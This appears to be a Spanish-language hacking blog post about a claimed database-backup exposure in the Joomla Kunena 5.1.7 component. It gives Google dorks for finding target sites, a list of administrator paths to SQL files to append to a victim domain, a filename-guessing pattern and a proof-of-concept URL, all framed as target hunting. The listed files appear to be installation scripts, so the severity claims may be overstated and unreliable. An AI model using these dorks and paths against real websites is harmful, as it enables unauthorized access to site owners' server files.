Joomla Kunena Components 5.1.7 | Exposición de BackUps de DBs

RedBirdRedBird 12/07/2018 10:44:00 p.m.

Exposición de BackUps de DBs


 Vulnerabilidad en Kunena Componets en su versión 5.1.7 de Joomla, expone los backup de las bases de datos.

Explosión de Vulnerabilidad


 Para identificar sitios los cuales implementan Kunena tenemos unos Dorks, con los cuales podemos realizar nuestra búsqueda de objetivos.
  • inurl:''/administrator/components/com_kunena/install/sql/''
  • inurl:''/index.php?option=com_kunena'' 
  • inurl:''/index.php?option=com_kunena&view=topic&catid=''
Con los Dorks anteriores buscamos nuestro objetivo. Ya una vez identificado, utilizaremos uno de los exploits, el cual sol debemos de sustituir en la URL:
https://www.objetivo.com/URL_EXPLOIT

  • /administrator/components/com_kunena/install/sql/migrate/mysql/kunena.sql 
  • /administrator/components/com_kunena/install/sql/migrate/mysql/fireboard.sql 
  • /administrator/components/com_kunena/install/sql/migrate/mysql/joomlaboard.sql 
  • /administrator/components/com_kunena/install/sql/migrate/mysql/create_tables.utf8.sql 
  • /administrator/components/com_kunena/install/sql/install/mysql/create_tables.utf8.sql 
  • /administrator/components/com_kunena/install/sql/install/mysql/default_ranks.sql 
  • /administrator/components/com_kunena/install/sql/install/mysql/default_smileys.sql 
  • /administrator/components/com_kunena/install/sql/install/mysql/reserved_aliases.sql 
  • /administrator/components/com_kunena/install/sql/updates/mysql/1.0.0-2007-04-15.sql 
  • /administrator/components/com_kunena/install/sql/updates/mysql/2.0.0-2011-10-19.sql 
  • /administrator/components/com_kunena/install/sql/updates/mysql/3.0.3-2013-10-01.sql 
  • /administrator/components/com_kunena/install/sql/updates/mysql/4.0.0-2015-03-26.sql 
  • /administrator/components/com_kunena/install/sql/updates/mysql/5.0.0-2015-12-02.sql 
  • /administrator/components/com_kunena/install/sql/updates/mysql/5.1.6-2018-11-07.sql
También podemos, indicar la fecha del backup.

  • /administrator/components/com_kunena/install/sql/updates/mysql/[NUMERO DE VERSION]-[AÑO]-[MES]-[DIA].sql

POC

objetivo.com/administrator/components/com_kunena/install/sql/migrate/mysql/kunena.sql
Descarga de un BackUp de Base de Datos





------------------------------------------------------------------[EXTRA]
VULNERABILIDAD:
KingSkrupellos from Cyberizm.Org Digital Security Team

Publicar un comentario

1 Comentarios

Slider Parnert

Subscribe Text

¿Quieres estar al día con noticias?

¡SUSCRIBETE AHORA!